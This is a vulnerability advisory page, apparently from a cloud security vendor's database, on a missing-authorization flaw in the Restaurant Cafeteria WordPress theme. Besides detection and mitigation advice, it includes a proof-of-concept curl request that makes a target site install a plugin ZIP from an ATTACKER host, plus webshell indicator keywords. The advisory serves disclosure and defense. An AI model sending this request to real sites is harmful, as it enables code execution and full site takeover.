
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-15445 is a Missing Authorization vulnerability in the Restaurant Cafeteria WordPress theme through version 0.4.6 that allows any authenticated user (including subscribers) to install and activate arbitrary plugins or import demo content that overwrites site configuration. The vulnerability was discovered by researcher Khaled Alenazi (Nxploited), added to WPScan on 2026-02-27, and publicly published on 2026-03-06. It carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, though WPScan rates it 4.3 (Medium), and is classified under CWE-862 (Missing Authorization) (WPScan, Red Hat). No fixed version is currently known.
The root cause is CWE-862 (Missing Authorization): the theme registers admin-ajax action handlers (restaurant_cafeteria_install_and_activate_plugin and import_theme_mods) without performing nonce verification or WordPress capability checks. Because these AJAX endpoints are accessible to any authenticated WordPress user, a low-privileged subscriber can POST directly to wp-admin/admin-ajax.php with a user-supplied plugin ZIP URL, causing the server to download, extract, and activate the plugin — resulting in arbitrary PHP code execution on activation. A second action (import_theme_mods) allows the same class of user to overwrite site-wide configuration including theme mods, pages, menus, and front page settings (WPScan).
Successful exploitation of the plugin-installation vector grants an attacker arbitrary PHP code execution on the WordPress server, effectively achieving full site compromise including data exfiltration, webshell deployment, and lateral movement within the hosting environment. The demo-content import vector allows any subscriber to silently overwrite critical site configuration (theme mods, pages, menus, front page), causing significant integrity and availability impact to the website. Both attack paths require only a valid low-privilege WordPress account, making the effective attack surface broad on sites with open registration (WPScan, Red Hat).
A working Proof of Concept (PoC) is publicly available via WPScan, demonstrating both the arbitrary plugin installation/activation and the demo content import vectors using simple curl commands. The EPSS score is 0.000180 (very low probability of near-term exploitation), and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution or in-the-wild exploitation has been reported at this time (WPScan).
wp-admin/admin-ajax.php with the action restaurant_cafeteria_install_and_activate_plugin, specifying plugin_details[plugin_text_domain], plugin_details[plugin_main_file], and plugin_details[plugin_url] pointing to the attacker-hosted ZIP:curl -i 'http://TARGET/wp-admin/admin-ajax.php' \
-H 'Cookie: wordpress_logged_in_...=<session_cookie>' \
-d 'action=restaurant_cafeteria_install_and_activate_plugin' \
-d 'plugin_details[plugin_text_domain]=evilplug' \
-d 'plugin_details[plugin_main_file]=evilplug.php' \
-d 'plugin_details[plugin_url]=http://ATTACKER/evilplug.zip'action=import_theme_mods to overwrite site configuration, pages, and menus with the theme's demo content (WPScan)./wp-admin/admin-ajax.php with action=restaurant_cafeteria_install_and_activate_plugin or action=import_theme_mods from low-privilege user sessions; outbound HTTP/HTTPS requests from the web server process to external or unusual URLs (plugin ZIP download).wp-content/plugins/ that were not installed through the WordPress admin dashboard; presence of webshell files (e.g., files containing eval, base64_decode, system, exec) in plugin directories.admin-ajax.php with the above action parameters from subscriber-level authenticated sessions; WordPress debug logs recording plugin activation events for unrecognized plugins.wp_options entries for active_plugins, theme_mods_restaurant-cafeteria, page_on_front, show_on_front, or nav menu assignments inconsistent with administrator activity.There is currently no known fix for CVE-2025-15445 — the Restaurant Cafeteria theme through version 0.4.6 remains vulnerable with no patched release available (WPScan). Site administrators should consider deactivating and removing the theme until a patched version is released. As a compensating control, disable open user registration to prevent unauthenticated users from obtaining the subscriber-level access required for exploitation, and implement a Web Application Firewall (WAF) rule to block POST requests to admin-ajax.php containing the restaurant_cafeteria_install_and_activate_plugin or import_theme_mods action parameters from non-administrator sessions.
The vulnerability was reported by independent researcher Khaled Alenazi (Nxploited) and verified by WPScan. A brief mention appeared on Bluesky via the CVE feed account. No significant vendor statements, major media coverage, or notable researcher commentary beyond the WPScan advisory have been identified (WPScan).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."